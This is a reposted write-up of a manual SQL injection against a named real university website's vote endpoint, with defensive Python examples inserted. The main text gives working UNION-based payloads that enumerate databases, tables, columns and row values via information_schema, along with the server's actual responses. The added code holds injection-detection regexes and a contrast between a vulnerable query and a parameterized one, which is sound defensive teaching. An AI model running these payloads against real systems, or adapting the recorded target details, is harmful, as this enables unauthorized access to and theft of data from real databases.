Notes on a manual MySQL injection case
Source: Internet | Editor: 程序博客网 | Time: 2024/05/22 18:23
A record of manually injecting the MySQL database behind one of the school's sites.
Information gathering
How it was found
Subdomain scan -> import into AWVS -> batch scan for blind injection
URL
http://home.bjtu.edu.cn/
Info (whatweb)
- 202.112.147.124 (school intranet)
- Apache/2.4.9
- Win64
- PHP/5.5.12
Parameter
http://home.bjtu.edu.cn/ctrl/vote/ajax_vote_response.php?req=3&tid=1
- tid (GET)
Testing
Confirming the injection => tid
Appending a semicolon produces an error, and the error text is echoed back:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 6
Determining the version: > 4.0
and ord(mid(version(),1,1))>51
Returns normally, so the version is > 4.0 and UNION is supported.
Finding the column count => 5
order by with binary search
tid=1 and order by 6
=> Unknown column '6' in 'order clause'
tid=1 and order by 5
=> [{"item_title":"3","item_id":"3","item_count":36},{"item_title":"4","item_id":"4","item_count":22},{"item_title":"5","item_id":"5","item_count":66},{"item_title":"\u5b66\u4e60\u8bdd\u98981-\u89c2\u70b92","item_id":"2","item_count":84},{"item_title":"\u5b66\u4e60\u8bdd\u98981-\u89c2\u70b9\u4e00","item_id":"1","item_count":103}]
union select
tid=1 and 1=2 union select 1,2,3,4,5...,n
- Error output:
The used SELECT statements have a different number of columns
- Correct output:
[{"item_title":"2","item_id":"1","item_count":4}]
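The probe sequence recorded above (a syntax error triggered by a stray character, a version() check, ORDER BY column counting, then UNION SELECT) leaves a characteristic trail in the web server's access log. The following is an added example, not code from the original post: it parses constructed Apache combined-format log lines (sample lines written for this example, using the endpoint path from the URL above) and flags any request whose tid parameter is not a plain integer or contains injection keywords, then counts probes per client address. The pattern names and the choice of which parameters must be numeric are assumptions made for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample lines in Apache combined log format (not from the original post).
# The query strings mirror the probes described above; the first two are normal votes.
SAMPLE_LOG = r'''
10.0.0.5 - - [22/May/2024:18:23:01 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=1 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.0.0.5 - - [22/May/2024:18:23:02 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=2 HTTP/1.1" 200 298 "-" "Mozilla/5.0"
192.0.2.10 - - [22/May/2024:18:24:10 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=1%27 HTTP/1.1" 200 180 "-" "Mozilla/5.0"
192.0.2.10 - - [22/May/2024:18:24:15 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=1%20and%20ord(mid(version(),1,1))%3E51 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.0.2.10 - - [22/May/2024:18:24:20 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=1%20order%20by%206 HTTP/1.1" 200 150 "-" "Mozilla/5.0"
192.0.2.10 - - [22/May/2024:18:24:25 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=1%20and%201=2%20union%20select%201,2,3,4,5 HTTP/1.1" 200 60 "-" "Mozilla/5.0"
192.0.2.10 - - [22/May/2024:18:24:30 +0800] "GET /ctrl/vote/ajax_vote_response.php?req=3&tid=1%20and%201=2%20union%20select%20table_schema,-1,-1,-1,-1%20from%20information_schema.columns HTTP/1.1" 200 400 "-" "Mozilla/5.0"
'''

# Apache combined format: client, identd, user, [timestamp], "METHOD target PROTOCOL", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures of the probing steps seen in the post (labels are my own naming).
INJECTION_PATTERNS = [
    ("quote", re.compile("['\"]")),
    ("boolean", re.compile(r"\b(?:and|or)\b\s+[\w(]", re.I)),
    ("order_by", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\b", re.I)),
    ("fingerprint", re.compile(r"\b(?:version|database|user)\s*\(|@@\w+", re.I)),
]


def analyze_request(target, numeric_params=("tid", "req")):
    """Return {param: [matched labels]} for parameters that look like injection probes.

    parse_qs percent-decodes the values, so '%27' is inspected as a real quote.
    Parameters the application treats as integers are also flagged when they are
    anything other than digits, which catches probes no keyword list knows about.
    """
    findings = {}
    for name, values in parse_qs(urlparse(target).query, keep_blank_values=True).items():
        for value in values:
            hits = [label for label, rx in INJECTION_PATTERNS if rx.search(value)]
            if name in numeric_params and not value.strip().isdigit():
                hits.insert(0, "non_numeric")
            if hits:
                findings[name] = hits
    return findings


def scan_log(text):
    """Return a list of (client_ip, request_target, findings) for every suspicious request."""
    flagged = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        findings = analyze_request(m.group("target"))
        if findings:
            flagged.append((m.group("ip"), m.group("target"), findings))
    return flagged


def probes_per_client(flagged):
    """Count flagged requests per client; a run of several from one address is the manual-injection pattern."""
    counts = {}
    for ip, _, _ in flagged:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for ip, target, findings in hits:
        print(ip, findings, target)
    print(probes_per_client(hits))
```

The numeric check is the more robust half of this: an endpoint whose tid is always an integer should never see letters, spaces or punctuation in that parameter, whatever keywords the request uses.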
Information gathering
and 1=2 union select [function],-1,-1,-1,-1
- version(): database version => 5.6.17
- database(): database of the current connection => stu
- @@version_compile_os: operating system => Win64
- @@datadir: database data directory => c:\wamp\bin\mysql\mysql5.6.17\data\
- @@basedir: MySQL installation path
Getting all database names
Input:
select * from stu where tid=1 and 1=2 union select SCHEMA_NAME,-1,-1,-1,-1 from information_schema.columns;
or:
select * from stu where tid=1 and 1=2 union select table_schema,-1,-1,-1,-1 from information_schema.columns;
Output:
[{"item_title":"-1","item_id":"information_schema","item_count":-1},{"item_title":"-1","item_id":"mysql","item_count":-1},{"item_title":"-1","item_id":"performance_schema","item_count":-1},{"item_title":"-1","item_id":"stu","item_count":-1},{"item_title":"-1","item_id":"student","item_count":-1}]
Getting the table names in stu
Input (including output formatting):
select * from stu where tid=1 and 1=2 union select concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-1,-1 from information_schema.columns where table_schema="stu";
Output:
[{"item_title":"-1","item_id":"[xxoo]fsa_about,fsa_contest_and_project,fsa_css3_example,fsa_nav_feedback,fsa_nav_feedback_type,fsa_nav_list,fsa_nav_page_list,fsa_nav_page_list_1,fsa_nav_page_list_395,fsa_nav_page_list_396,fsa_nav_page_list_398,fsa_nav_page_list_399,fsa_nav_page_list_400,fsa_nav_page_list_401,fsa_nav_page_list_402,fsa_nav_page_list_403,fsa_nav_page_list_404,fsa_nav_...[xxoo]","item_count":-1}]
Getting the column names in fsa_vote_topic
Input:
and 1=2 union select concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT column_name),0x5B78786F6F5D),-1,-1,-1,-1 from information_schema.columns where table_name='fsa_vote_topic'
Output:
{"item_title":"-1","item_id":"[xxoo]topic_id,topic_title,topic_type_id[xxoo]","item_count":-1}]
Determining the number of records
Input:
and 1=2 union select concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-1,-1,-1,-1 from fsa_vote_topic
Output:
[{"item_title":"-1","item_id":"[xxoo]12[xxoo]","item_count":-1}]
Getting field values
Input:
Changing the LIMIT offset one step at a time dumps the remaining rows.
and 1=0 union select concat(0x5B78786F6F5D,topic_title,0x5B78786F6F5D),-1,-1,-1,-1 from fsa_vote_topic LIMIT 0,1
Output:
[{"item_title":"-1","item_id":"[xxoo]\u5b66\u4e60\u8bdd\u98981[xxoo]","item_count":-1}]
Decoded => 学习话题1
Note
When writing the payload, be careful: arguments inside functions are not quoted, while values assigned with an equals sign must be quoted.
Without quotes (topic_title in fsa_vote_topic): concat(0x5B78786F6F5D,topic_title,0x5B78786F6F5D)
from fsa_vote_topic LIMIT 0,1
With quotes (when assigning with an equals sign): table_name='fsa_vote_topic'
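The quoting rules above only matter because the tid value is pasted into the SQL text. As an added example (not the post's or the site's code), the block below uses Python's sqlite3 as a stand-in for the PHP/MySQL endpoint, with a constructed vote_item table carrying the five columns the ORDER BY probing found and the fsa_vote_topic table the post enumerated (table contents are made up). The vulnerable lookup returns fsa_vote_topic rows for the UNION payload recorded above, while the hardened version validates tid as an integer, binds it as a parameter, and keeps database error text out of the response, which was the first thing that confirmed the injection.

```python
import sqlite3

# Constructed stand-in schema (sqlite3 instead of MySQL; table name vote_item and all rows are assumed).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE vote_item (item_id INTEGER, item_title TEXT, item_count INTEGER,
                                tid INTEGER, sort_order INTEGER);
        INSERT INTO vote_item VALUES (1, 'option A', 103, 1, 1), (2, 'option B', 84, 1, 2),
                                     (3, 'option C', 4, 2, 1);
        CREATE TABLE fsa_vote_topic (topic_id INTEGER, topic_title TEXT, topic_type_id INTEGER);
        INSERT INTO fsa_vote_topic VALUES (1, 'topic 1 (secret)', 1), (2, 'topic 2 (secret)', 1);
    """)
    return db


def vulnerable_lookup(db, tid):
    """The pattern the post exploited: the raw GET parameter becomes part of the SQL text."""
    sql = "SELECT * FROM vote_item WHERE tid=" + tid
    return db.execute(sql).fetchall()


def hardened_lookup(db, tid):
    """Fix: check the type first, then bind the value so it can never be parsed as SQL syntax."""
    try:
        tid_int = int(tid)
    except (TypeError, ValueError):
        raise ValueError("tid must be an integer")  # the request handler turns this into a 400
    return db.execute("SELECT * FROM vote_item WHERE tid=?", (tid_int,)).fetchall()


def handle_request(db, tid, lookup):
    """Simulated endpoint: database error detail is logged server-side, never echoed to the client."""
    try:
        return {"status": 200, "rows": lookup(db, tid)}
    except ValueError:
        return {"status": 400, "rows": []}
    except sqlite3.Error as exc:
        print("db error logged server-side:", exc)  # stays out of the HTTP response
        return {"status": 500, "rows": []}


# The UNION payload recorded in the post, re-targeted at the constructed schema.
PAYLOAD = "1 and 1=2 union select topic_title,-1,-1,-1,-1 from fsa_vote_topic"


def compare(tid):
    """Run one request value through both implementations; report status and first-column values."""
    db = make_db()
    vuln = handle_request(db, tid, vulnerable_lookup)
    hard = handle_request(db, tid, hardened_lookup)
    return {
        "vulnerable": (vuln["status"], sorted(r[0] for r in vuln["rows"])),
        "hardened": (hard["status"], sorted(r[0] for r in hard["rows"])),
    }


if __name__ == "__main__":
    print(compare("1"))        # both return the two items for topic 1
    print(compare(PAYLOAD))    # vulnerable leaks fsa_vote_topic rows; hardened answers 400
    print(compare("1'"))       # vulnerable hits a syntax error; hardened answers 400
```

With the parameter bound, the payload is compared against tid as a value and simply matches nothing, so the quoting subtleties the note above describes no longer have any effect. In PHP the same shape is a PDO or mysqli prepared statement with an integer-cast parameter; the page's stack (PHP 5.5) supports both.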